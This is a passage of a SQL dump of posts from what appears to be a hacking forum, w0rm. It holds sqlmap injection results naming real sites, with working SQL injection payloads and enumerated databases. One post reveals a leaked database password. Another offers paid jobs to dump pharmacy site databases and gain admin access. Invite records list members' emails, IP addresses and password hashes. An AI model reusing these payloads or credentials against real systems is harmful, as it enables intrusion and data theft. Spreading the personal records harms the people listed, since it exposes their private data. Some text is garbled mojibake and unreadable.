DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.bramjnet.com/vb3/member.php?u=1826270 | http://www.bramjnet.com/vb3/member.php?u=1826270 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2098, 1733, 0, 'null', 9, 'inj', 1411044801, '[B]hччp://hitnews.com/index.php?id=12&group=2[/B]\n[QUOTE]Place: GET\nParameter: group\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: id=12&group=2 AND 6098=6098\n\n Type: AND/OR time-based blind\n Title: MySQL > 5.0.11 AND time-based blind\n Payload: id=12&group=2 AND SLEEP(5)\n\nPlace: GET\nParameter: id\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: id=12 AND 9463=9463&group=2\n\n Type: UNION query\n Title: MySQL UNION query (NULL) - 3 columns\n Payload: id=12 UNION ALL SELECT NULL,NULL,CONCAT(0x71776b7271,0x5a6c63745a436272424c,0x7170786f71)#&group=2\n\n Type: AND/OR time-based blind\n Title: MySQL > 5.0.11 AND time-based blind\n Payload: id=12 AND SLEEP(5)&group=2\n---\nweb server operating system: Linux Gentoo\nweb application technology: Apache, PHP 5.5.9\nback-end DBMS: MySQL 5.0.11\nsqlmap identified the following injection points with a total of 0 HTTP(s) requests:\n---\nPlace: GET\nParameter: group\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: id=12&group=2 AND 6098=6098\n\n Type: AND/OR time-based blind\n Title: MySQL > 5.0.11 AND time-based blind\n Payload: id=12&group=2 AND SLEEP(5)\n\nPlace: GET\nParameter: id\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: id=12 AND 9463=9463&group=2\n\n Type: UNION query\n Title: MySQL UNION query (NULL) - 3 columns\n Payload: id=12 UNION ALL SELECT NULL,NULL,CONCAT(0x71776b7271,0x5a6c63745a436272424c,0x7170786f71)#&group=2\n\n Type: AND/OR time-based blind\n Title: MySQL > 5.0.11 AND time-based blind\n Payload: id=12 AND SLEEP(5)&group=2\n---\nweb server operating system: Linux Gentoo\n[/QUOTE]\n\n[B]hччp://plc.casino.com/leaderboard/country.php?id=425 [/B]\n\n[QUOTE]Place: GET\nParameter: id\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: id=425 AND 5661=5661\n\n Type: AND/OR time-based blind\n Title: Oracle AND time-based blind (heavy query)\n Payload: id=425 AND 9887=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)\n---\nweb application technology: PHP 5.2.6, Apache\nback-end DBMS: Oracle\nsqlmap identified the following injection points with a total of 0 HTTP(s) requests:\n---\nPlace: GET\nParameter: id\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: id=425 AND 5661=5661\n\n Type: AND/OR time-based blind\n Title: Oracle AND time-based blind (heavy query)\n Payload: id=425 AND 9887=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)\n---\nweb application technology: PHP 5.2.6, Apache\nback-end DBMS: Oracle\nsqlmap identified the following injection points with a total of 0 HTTP(s) requests:\n---\nPlace: GET\nParameter: id\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: id=425 AND 5661=5661\n\n Type: AND/OR time-based blind\n Title: Oracle AND time-based blind (heavy query)\n Payload: id=425 AND 9887=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)\n---\nweb application technology: PHP 5.2.6, Apache\nback-end DBMS: Oracle\n[/QUOTE]\n\n[B]hччp://www.proxycoins.com/requests.php?id=7 [/B]\n\n[QUOTE]Place: GET\nParameter: id\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: id=7 AND 3318=3318\n\n Type: UNION query\n Title: MySQL UNION query (NULL) - 16 columns\n Payload: id=-6967 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71686c6771,0x6270454850457a6f6168$\n\n Type: AND/OR time-based blind\n Title: MySQL > 5.0.11 AND time-based blind\n Payload: id=7 AND SLEEP(5)\n---\nweb application technology: PHP 5.3.28, Apache 2.2.27\nback-end DBMS: MySQL 5.0.11\navailable databases [6]:\n[*] information_schema\n[*] mysql\n[*] performance_schema\n[*] ProxyCoins\n[*] test\n[*] tests\n[/QUOTE]\n\n[B]hччp://www.rba.ru/content/news/vid_news_str.php?id=2921[/B]\n\n[QUOTE]\n---\nPlace: GET\nParameter: id\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: id=2921 AND 4713=4713\n\n Type: AND/OR time-based blind\n Title: MySQL > 5.0.11 AND time-based blind\n Payload: id=2921 AND SLEEP(5)\n---\nweb application technology: PHP 5.2.6\nback-end DBMS: MySQL 5.0.11\navailable databases [5]:\n[*] greylist\n[*] guk_cms_rba\n[*] information_schema\n[*] rba\n[*] test\n[/QUOTE]\n\n[B]hччp://www.socialshoppers.us/wiki.php?id=2823[/B]\n\n[QUOTE]Place: GET\nParameter: id\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: id=2823 AND 4182=4182\n\n Type: UNION query\n Title: MySQL UNION query (NULL) - 6 columns\n Payload: id=-1534 UNION ALL SELECT NULL,CONCAT(0x71736d6471,0x67586865785552576f45,0x716d736a71),NULL,NULL,NULL,NULL#\n\n Type: AND/OR time-based blind\n Title: MySQL > 5.0.11 AND time-based blind\n Payload: id=2823 AND SLEEP(5)\n---\nweb server operating system: Linux Ubuntu 12.04 (Precise Pangolin)\nweb application technology: PHP 5.4.9, Apache 2.2.22\nback-end DBMS: MySQL 5.0.11\navailable databases [2]:\n[*] c0social_db\n[*] information_schema\n[/QUOTE]', 1, 1, '', 0, 1, 0, 0, 0),
(2099, 1733, 2098, 'w0rm', 1, '', 1411049200, '[url]www.proxycoins.com[/url]\n\n[QUOTE]$dbpass=\"N1mr0dL3h4v1\";\n//$dbpass=\"root\";\n// procedural\n$mysqli_link = mysqli_connect(\"localhost\", \"root\", $dbpass, \"ProxyCoins\") or die(\"ERROR: cannot connect to MySQL server.\".mysqli_error());\n[/QUOTE]\n\nCûøû ÑÂþрõц, õÑÂûø øýтõрõÑÂõý úþüу-тþ ÷ðûью.', 1, 0, '', 0, 1, 0, 0, 0),
(2100, 1728, 2066, 'Psych0tr1a', 11, '', 1411050937, 'Ñ ÑÂýðчðûð ÿрþÑÂúðýøû øх ôøðÿð÷þý ýð 80 ø 443 ÿþрты ð ôðûьшõ ÷ðтþчøû ÑÂþфт ÿþô úðúþùтþ ÿðñûøú ÑÂõрòøѠip to host', 1, 0, '', 0, 1, 0, 0, 0),
(2105, 1736, 0, 'Invite', 2, '{$name}', 1411095490, '[SIZE=\'4\'][COLOR=\'Sienna\']Jimmy[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: jamesmarcosjuarez@hotmail.com\n[b]Info[/b]: Hi,\r\n\r\n36 years old, been coding since 7. Loving Python right now and doing some interesting work with X509 Certificates and Public Key Encryption.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 201.250.30.239\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/37.0.2062.94 Chrome/37.0.2062.94 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : jimmy : jimmy.neitron@mail.ru : 88.204.251.80 : 3a3df9b360169add3678bd16a2a2fb48\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/jimmyyeltsin | http://vk.com/jimmyyeltsin \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2106, 1737, 0, 'Invite', 2, '{$name}', 1411142645, '[SIZE=\'4\'][COLOR=\'Sienna\']M3T4X[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: m3t4x.w0rm@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 196.217.173.86\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://m3t4x.panka.com.cn | m3t4x.panka.com.cn \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2107, 1738, 0, 'Invite', 2, '{$name}', 1411150490, '[SIZE=\'4\'][COLOR=\'Sienna\']Tanreon[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: kabachok@dukgo.com\n[b]e-mail[/b]: thoriumas@gmail.com\n[b]Info[/b]: Долгое время ищу достойные 0деи для разных CMS и для распространенного ПО на серверах. Может чтото подскажите или расскажите... готов много покупать.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 176.212.230.64\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/_potatopuff/.../219858882812583937 | https://twitter.com/_potatopuff/.../219858882812583937 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2108, 1739, 0, 'Invite', 2, '{$name}', 1411160962, '[SIZE=\'4\'][COLOR=\'Sienna\']youknowho[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: dubsteve911@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 174.58.91.56\n[*][b]real ip[/b]: 174.58.91.56\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://youknowho.tumblr.com | youknowho.tumblr.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2109, 1099, 1170, 'lumbricus', 39, '', 1411203918, 'ýуöôðõтõÑÂÑŒ ûø òы ò ÿþüþщø ôûѠ÷ðúðûúø?', 1, 0, '', 0, 1, 0, 0, 0),
(2110, 1740, 0, 'Invite', 2, '{$name}', 1411232341, '[SIZE=\'4\'][COLOR=\'Sienna\']synack[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: milw0rm@jabber.ccc.de\n[b]e-mail[/b]: synack@safe-mail.net\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\nskills in coding python, perl and C.\r\nworking on bootloaders and bots now :)\r\ninterested in any cool exploits for sale on site!\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 173.254.223.72\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://synack.com | synack.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2112, 1742, 0, 'Invite', 2, '{$name}', 1411255831, '[SIZE=\'4\'][COLOR=\'Sienna\']LordNikon[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: pulamea@jabber.ru\n[b]e-mail[/b]: michaelstormz@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 178.162.205.5\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://smotri.com/user/shalun2010/ | http://smotri.com/user/shalun2010/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2113, 1743, 0, 'Invite', 2, '{$name}', 1411294539, '[SIZE=\'4\'][COLOR=\'Sienna\']jdhjf[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ejfrhejhfje@jhgujfhg.in\n[b]e-mail[/b]: hbhg@hhbj.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 115.242.69.223\n[*][b]real ip[/b]: 115.242.69.223\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://jdhjf.com.w3snoop.com | jdhjf.com.w3snoop.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2114, 1744, 0, 'Invite', 2, '{$name}', 1411304351, '[SIZE=\'4\'][COLOR=\'Sienna\']my mail[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Mail2015@my.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 37.187.176.64\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://my-mail.co.il | my-mail.co.il \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2115, 1745, 0, 'Invite', 2, '{$name}', 1411304352, '[SIZE=\'4\'][COLOR=\'Sienna\']my mail[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Mail2015@my.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 37.187.176.64\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://my-mail.co.il | my-mail.co.il \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2116, 1746, 0, 'Invite', 2, '{$name}', 1411304356, '[SIZE=\'4\'][COLOR=\'Sienna\']my mail[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Mail2015@my.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 37.187.176.64\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://my-mail.co.il | my-mail.co.il \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2117, 1747, 0, 'Invite', 2, '{$name}', 1411304358, '[SIZE=\'4\'][COLOR=\'Sienna\']my mail[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Mail2015@my.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 37.187.176.64\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://my-mail.co.il | my-mail.co.il \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2118, 1748, 0, 'lumbricus', 39, 'Idei pentru comunitatea noastră', 1411306253, 'RO: Am fost încântat pentru prima oară vedea w0rm comunitate... dar am fost întotdeauna frică de inevitabil.\r\n\r\ndeschide site-ul = calitatea slabă :(\r\n\r\navem o mare abilitate și nu trebuie să fii așa de nerăbdător!\r\n\r\nEnglaza: I was happy to see w0rm.in.. it was a great idea to bring together knowledge without script children or scammers destroying good work. \r\n\r\nbut now we are faced with a new frontier...it was a 22nd catch... where if we open the forum then we get high volumes of members.. but we also get low quality and all sorts of time wasting..\r\n\r\ni believe that we should put more effort into maintenance and keeping w0rm community strong and thriving...public is not good.. we have enough skill here to be prosperous both intellectually and monetarily if thats your way...\r\n\r\nwho is against open forum ? if anything you should raise the member price to 1000 USD for membership.', 1, 0, '', 0, 1, 0, 0, 0),
(2119, 1748, 2118, 'null', 9, '', 1411318776, 'úрøú ôушø? òðшø ÿрõôûþöõýøÑÂ? ñуôьтõ úþýúрõтýõõ!', 1, 1, '', 0, 1, 0, 0, 0),
(2120, 1748, 2118, 'w0rm', 1, '', 1411319688, 'Üы þñÑÂуôøûø, lumbricus óþтþò ÿþüþчь ѠфøúÑÂþü ø ôþрðñþтúþù market-ð, ýу ø Ѡýþòыüø üõüñõрðüø, ÷ð чтþ õüу ñþûьшõõ ÑÂÿðÑÂøñþ!', 1, 0, '', 0, 1, 0, 0, 0),
(2121, 1083, 1119, 'Psych0tr1a', 11, '', 1411324901, '[code]www.bmpharmacy.com\n www.universaldrugstore.com\n www.canadadrugcenter.com\n www.northwestpharmacy.com\n www.canadadrugs.com\n www.jandrugs.com\n www.canadadrugpharmacy.com\n www.planetdrugsdirect.com\n\ni need full .sql db + admin access\n\n$500 wmz per job\n\nthank you[/code]', 1, 0, '', 0, 1, 0, 0, 0),
(2122, 1749, 0, 'Invite', 2, '{$name}', 1411346254, '[SIZE=\'4\'][COLOR=\'Sienna\']Gr4nD1o5[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 61802422\n[b]e-mail[/b]: gr4nd1o5@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 186.28.121.86\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://c4c.su/member.php?u=50300&langid=2 | http://c4c.su/member.php?u=50300&langid=2 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
